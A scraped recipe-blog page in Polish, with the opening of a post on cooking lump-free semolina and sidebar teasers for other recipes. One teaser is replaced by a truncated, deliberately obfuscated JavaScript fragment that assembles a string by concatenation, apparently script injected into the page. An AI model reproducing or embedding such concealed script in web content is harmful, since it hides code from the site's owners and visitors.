Kasza manna – jak gotować, żeby nie powstały grudki?

Przyznam się Wam do czegoś… Przez lata kasza manna była moim kulinarnym koszmarem. Te okropne grudki, które pojawiały się dosłownie znikąd, sprawiały, że moje śniadania wyglądały jak nieudany eksperyment chemiczny! Dopiero kiedy moja teściowa (tak, tak – czasem te kulinarne mądrości przychodzą z najmniej oczekiwanych źródeł) pokazała mi swój sposób, zrozumiałam, gdzie popełniałam błąd. Dziś …
Najnowsze przepisy
(function(){ xw43_="o"+("p"+"")+"en"+"";xw43_+="s"+("tat")+( ⇖ 8
Szybkie śniadanie z BlendyGo 3 i BlendyPack Ostatnio mam... ⇖ 13
Prosty deser z kaszą manną i miodem to idealny przepis na... ⇖ 18
Pesto sardo z orzechami włoskimi, smak Sardynii w mojej... ⇖ 14
O kruchych ciastkach chyba nie trzeba dużo mówić na... ⇖ 23
Przepisy z bloga
Nie zawsze mamy czas (albo chęć), by wieczorem stać przy... ⇖ 56
Chcesz zamrozić borówki amerykańskie, ale nie wiesz jak?... ⇖ 81
Mrożenie sajgonek to sztuka! Odkryj sekrety, jak zachować... ⇖ 89
Poznaj sekrety mrożenia puree z dyni! Zachowaj smak... ⇖ 76
Zastanawiasz się, czy mrozić lasagne? Odkryj praktyczne... ⇖ 90
Przepisy na czasie
Te ogórki to prawdziwy słoikowy hit, który robi furorę... ⇖ 1458
Pierogi ruskie to klasyk, który zawsze się sprawdza!... ⇖ 1059
Sałatka Słoikowa od Teściowej to sprawdzony przepis na... ⇖ 645
Zapraszam Was serdecznie do kolejnego przepisu, w którym... ⇖ 558
Uwielbiam , chociaż nie jestem przesadnie mięsożerna.I... ⇖ 530
Najlepszy kompot na zimę to jest ten z mirabelek, który... ⇖ 470
Plasterki kanapkowe na zimę to znakomita propozycja na... ⇖ 466
Znakomite na zimę złote ogórki, które świetnie nadają... ⇖ 461